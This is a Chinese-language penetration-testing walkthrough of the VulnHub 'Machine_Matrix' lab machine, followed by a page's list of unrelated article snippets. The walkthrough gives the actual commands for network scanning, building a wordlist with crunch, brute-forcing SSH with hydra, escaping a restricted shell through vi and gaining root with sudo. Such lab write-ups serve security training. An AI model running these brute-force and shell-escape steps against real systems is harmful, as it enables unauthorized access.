Machine_Matrix打靶渗透【附代码】(权限提升)
靶机下载地址:
https%3A%2F%2Fdownload.vulnhub.com%2Fmatrix%2FMachine_Matrix.zip
1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:D9:36:81'
1.2. 端口扫描
nmap -p- 192.168.7.155
1.3. 目录扫描
dirb http://192.168.7.155
1.4. 敏感信息获取
whatweb http://192.168.7.155
2. WEB打点尝试寻找漏洞点
2.1. 进入80端口主页面
1.老规矩,点点功能模块,看看有能利用的点吗 -> 网页提示跟随白兔
2.右键点击兔子 -> 新建标签页打开 -> 有一个图片路径
url提示port:31337端口,拼接访问 -> 无果
3.查看网页源码,给了一段base64加密值
ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=
解码得下文,大意为输出一段内容至Cypher.matrix文件中
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix拼接Cypher.matrix试试,直接下载下来了这个文件,文本方式打开看看
熟悉的Brainfuck加密,找工具解密一下
You can enter into matrix as guest, with password k1ll0rXX
# 您可以以访客身份进入矩阵,密码为k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
# 事实上,我忘记了最后两个字符,所以我用XX代替了。试试你的运气,找到正确的密码字符串。2.2. GetShell
1.根据他的提示密码是不完整的,使用kali中crunch工具生成字典,暴力破解
crunch 8 8 -t k1ll0r%@ -o passwd.txt
2.使用 hydra 工具进行爆破,得到账号密码【k1ll0r7n】
hydra -l guest -P passwd.txt ssh://192.168.7.1553.尝试ssh进行连接,连接成功
ssh guest@192.168.7.155
3. 权限提升
3.1. 老规矩看执行命令权限
sudo -l
很多命令受限
export #查看环境变量
# /bin/rbash权限受限制
# 发现vi命令可以使用,vi绕过rbash
vi
# 输入'冒号'
!/bin/bash
发现还是无法执行一些命令 -> 命令可正常执行 -> 执行以下命令,配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo su # 密码k1ll0r7n
相关文章:
Machine_Matrix打靶渗透【附代码】(权限提升)
靶机下载地址: https%3A%2F%2Fdownload.vulnhub.com%2Fmatrix%2FMachine_Matrix.zip 1. 主机发现端口扫描目录扫描敏感信息获取 1.1. 主机发现 nmap -sn 192.168.7.0/24|grep -B 2 08:00:27:D9:36:81 1.2. 端口扫描 nmap -p- 192.168.7.155 1.3. 目录扫描 dir…...
代码随想录算法训练营Day22 | Leetcode 77 组合 Leetcode 216 组合总和Ⅲ Leetcode17 电话号码的字母组合
前言 回溯算法中递归的逻辑不重要,只要掌握回溯的模板以及将问题转化为树形图,整个问题就很好解决了,比二叉树简单。 Leetcode 77 组合 题目链接:77. 组合 - 力扣(LeetCode) 代码随想录题解:…...
【微信小程序实战教程】之微信小程序中的 JavaScript
微信小程序中的 JavaScript 微信小程序的业务逻辑都是通过JavaScript语言来实现的,本章我们将详细的讲解JavaScript的基本概念,以及在小程序中如何使用JavaScript语言。JavaScript是一种轻量的、解释型的、面向对象的头等函数语言,是一种动态…...
)
K-近邻算法(一)
一、 K- 近邻算法 (KNN) 概念 1.1 K- 近邻算法 (KNN) 概念 K Nearest Neighbor 算法⼜叫 KNN 算法,这个算法是机器学习⾥⾯⼀个⽐较经典的算法, 总体来说 KNN 算法是相对⽐ 较容易理解的算法 定义 : 如果⼀个样本在特征空间中的k 个最相似 ( 即特征空间…...
从零开始之AI视频制作篇
从零开始之AI视频制作篇 文章目录 从零开始之AI视频制作篇前言一、工具列表二、成片展示三、制作流程1、获取图片素材2、图片生成视频2.1 Runway操作流程 3、文本生成语音3.1 Fish Audio操作流程 4、视频剪辑4.1 音频素材4.2 字幕生成 四、Runway提示词参考:参考 前…...
Java之TCP编程综合案例
1.反转案例 搭建一个TCP客户端,从键盘录入整行数据(遇到quit结束录入)然后发送给服务器,再接收服务器返回的数据并输出。 package com.briup.chap12;public class Test064_ReversalClient {public static void main(String[] ar…...
【数据分析---Pandas实战指南:精通数据查询、增删改操作与高效索引和列名操作管理】
前言: 💞💞大家好,我是书生♡,本阶段和大家一起分享和探索数据分析,本篇文章主要讲述了:数据查询操作,数据增删改操作,索引和列名操作等等。欢迎大家一起探索讨论&#x…...
Spring Cloud全解析:注册中心之Eureka服务获取和服务续约
服务获取和服务续约 eureka客户端通过定时任务的方式进行服务获取和服务续约,在com.netflix.discovery.DiscoveryClient类中,启动了两个定时任务来进行处理 private void initScheduledTasks() {// 是否需要拉取if (clientConfig.shouldFetchRegistry(…...
三相整流电路交流侧谐波仿真分析及计算
一、三相桥式全控整流电路和功率因数测量电路SIMULINK 模型 如图4-1,根据高频焊机的主电路机构和工作原理,可将高频焊机三相整流部分等效为阻感负载的三相桥式全控整流电路模型,其由三相交流电压源、三相晶闸管整流桥、同步六脉冲触发器和阻感…...
了解Java中的反射,带你如何使用反射
反射的定义 反射(Reflection)是Java的一种强大机制,它允许程序在运行时动态地查询和操作类的属性和方法。通过反射,Java程序可以获取类的信息,比如类的名称、方法、字段,以及可以动态地创建对象、调用方法…...
【c++】基础知识——快速入门c++
🌟🌟作者主页:ephemerals__ 🌟🌟所属专栏:C 目录 前言 一、手搓一个Hello World 二、命名空间namespace 1.命名空间的定义 2.命名空间的使用 3.命名空间补充知识 三、c中的输入和输出 四、缺省参…...
AI学习记录 - 自注意力机制的计算流程图
过段时间解释一下,为啥这样子计算,研究这个自注意力花了不少时间,网上很多讲概念,但是没有具体的流程图和计算方式总结…...
JavaScript快速入门,满满干货总结,快速掌握JS语法,DOM,BOM,事件
目录 一. JavaScript、HTML、CSS简介 1.1 HTML简介和举例说明 1.2 CSS简介和举例说明 1.3 JavaScript 简介和举例说明 二. JavaScript 基本语法 2.1 变量类型和定义方式 2.2 逻辑运算符,比较运算符 2.3 流程控制,if,if...else...&…...
【C++】C++入门基础【类与对象】
目录 1.类 1.1类的定义 1.2struct 与 class对比 2.访问限定符 3. 类域 4.实例化 5.存储大小----内存对齐 6.this指针 1.类 1.1类的定义 class作为类的关键字,后面跟的是类的名字,如Stack,{}中的为类的主体,类定义结束时…...
Qt | QScatterSeries 散点图
点击上方"蓝字"关注我们 01、QScatterSeries QScatterSeries 的类,它将代表散点图中的一个系列。这个类将包含数据点、颜色和样式等属性,以及用于绘制散点图的方法。 02、main.cpp #include <QtWidgets/QApplication>#include <QtWidgets/QMainWindow…...
无缝协作的艺术:Codigger 视频会议(Meeting)的用户体验
在当今数字化的时代,远程协作已经成为工作和学习中不可或缺的一部分。然而,远程协作也面临着诸多挑战,如沟通不畅、信息同步不及时、协作工具的复杂性等。而 Codigger 视频会议(Meeting)作为一款创新的工具,…...
C基础练习(学生管理系统)
1.系统运行,打开如下界面。列出系统帮助菜单(即命令菜单),提示输入命令 2.开始时还没有录入成绩,所以输入命令 L 也无法列出成绩。应提示“成绩表为空!请先使用命令 T 录入学生成绩。” 同理,当…...
网络安全抓包封包WEB
目录 1.抓包 1. 网络故障排除 应用 意义 2. 网络安全监控 应用 意义 3. 性能优化 应用 意义 4. 协议分析与开发 应用 意义 5. 数据分析与合规性审计 应用 意义 抓包工具 总结 2.抓包的应用对象 1. 网络设备 路由器和交换机 防火墙和入侵检测系统ÿ…...
Spring Boot - 在Spring Boot中实现灵活的API版本控制(上)
文章目录 为什么需要多版本管理?在Spring Boot中实现多版本API的常用方法1. URL路径中包含版本号2. 请求头中包含版本号3. 自定义注解和拦截器 注意事项 为什么需要多版本管理? API接口的多版本管理在我们日常的开发中很重要,特别是当API需要…...
普中51单片机:DS18B20温度传感器操作指南(十三)
文章目录 引言电路图引脚讲解初始化时序写时序读时序温度变换温度读取完整代码 引言 DS18B20是一款单总线接口的数字温度传感器,仅需一个IO口即可实现数据通信。这里只对如何简单操作开发板的DS1802进行讲解,关于DS18B20温度传感器的详细操作原理&#…...
开源辅助工具YimMenu:GTA5安全使用指南与进阶技巧
开源辅助工具YimMenu:GTA5安全使用指南与进阶技巧 【免费下载链接】YimMenu YimMenu, a GTA V menu protecting against a wide ranges of the public crashes and improving the overall experience. 项目地址: https://gitcode.com/GitHub_Trending/yi/YimMenu …...
黑客马拉松利器:OpenClaw+SecGPT-14B快速构建安全PoC
黑客马拉松利器:OpenClawSecGPT-14B快速构建安全PoC 1. 缘起:当安全专家遇上自动化助手 去年参加某次网络安全竞赛时,我遇到了一个典型痛点:在48小时的黑客马拉松中,团队需要快速验证多个漏洞猜想,但手动…...
拿火吉他温湿度管控专项保养与环境适配指南
温湿度是影响吉他使用寿命与结构稳定性的核心因素,即便拿火吉他采用了 AirSonic 碳纤维一体琴体,大幅降低了环境对琴体的影响,但吉他的指板、琴颈、琴桥等木质部件,依然会对温湿度变化极为敏感,极端温湿度环境会导致琴…...
利用快马平台与ccswitch快速构建可切换功能模块的web应用原型
今天想和大家分享一个快速验证前端功能模块切换方案的小技巧。最近在做一个需要动态切换不同功能模块的项目,尝试了用ccswitch工具配合InsCode(快马)平台来搭建原型,效果出乎意料地好。 为什么选择ccswitch ccswitch是一个轻量级的JavaScript工具&…...
手把手教你用树莓派GPIO点个灯:从Python到C语言三种方法全搞定
树莓派GPIO实战:Python与C语言点亮LED的三种经典方案 第一次拿到树莓派时,最让人兴奋的莫过于那些整齐排列的GPIO引脚——它们就像通往物理世界的大门。而点亮一个LED,无疑是推开这扇门最经典的"Hello World"。但你知道吗ÿ…...
使用Phi-4-mini-reasoning优化算法设计:从思路到代码的智能转换
使用Phi-4-mini-reasoning优化算法设计:从思路到代码的智能转换 1. 算法工程师的新助手 作为一名算法工程师,你是否经常遇到这样的场景:面对一个复杂的业务需求,脑海中已经有了初步的算法思路,但要把这个思路转化为可…...
Chord在科研视频处理中的应用:实验过程帧级语义标注与行为时序建模
Chord在科研视频处理中的应用:实验过程帧级语义标注与行为时序建模 1. 引言:科研视频分析的挑战与机遇 在科学研究领域,特别是生物学、心理学、医学和工程学等学科中,实验过程视频记录已成为不可或缺的研究手段。研究人员通过视…...
OpenClaw技能开发入门:为gemma-3-12b-it编写第一个天气查询模块
OpenClaw技能开发入门:为gemma-3-12b-it编写第一个天气查询模块 1. 为什么选择OpenClaw开发自定义技能? 去年冬天,我经常需要同时查看多个城市的天气来决定出差行程。反复切换浏览器标签和天气应用的低效操作,让我萌生了用AI自动…...
Wan2.2-I2V-A14B惊艳效果:动态镜头推移、自然光影变化、流畅运镜展示
Wan2.2-I2V-A14B惊艳效果:动态镜头推移、自然光影变化、流畅运镜展示 1. 专业级视频生成能力 Wan2.2-I2V-A14B模型带来了令人惊叹的视频生成效果,能够将简单的文字描述转化为专业水准的动态视频。这个模型特别擅长处理复杂的镜头运动和光影变化&#x…...
OpenClaw密码管理方案:Qwen3-14b_int4_awq辅助生成与安全存储
OpenClaw密码管理方案:Qwen3-14b_int4_awq辅助生成与安全存储 1. 为什么需要AI辅助的密码管理 去年我的三个重要账户相继被盗,原因都是使用了简单密码和重复密码。传统密码管理器虽然解决了存储问题,但生成密码时往往缺乏场景适配性——那些…...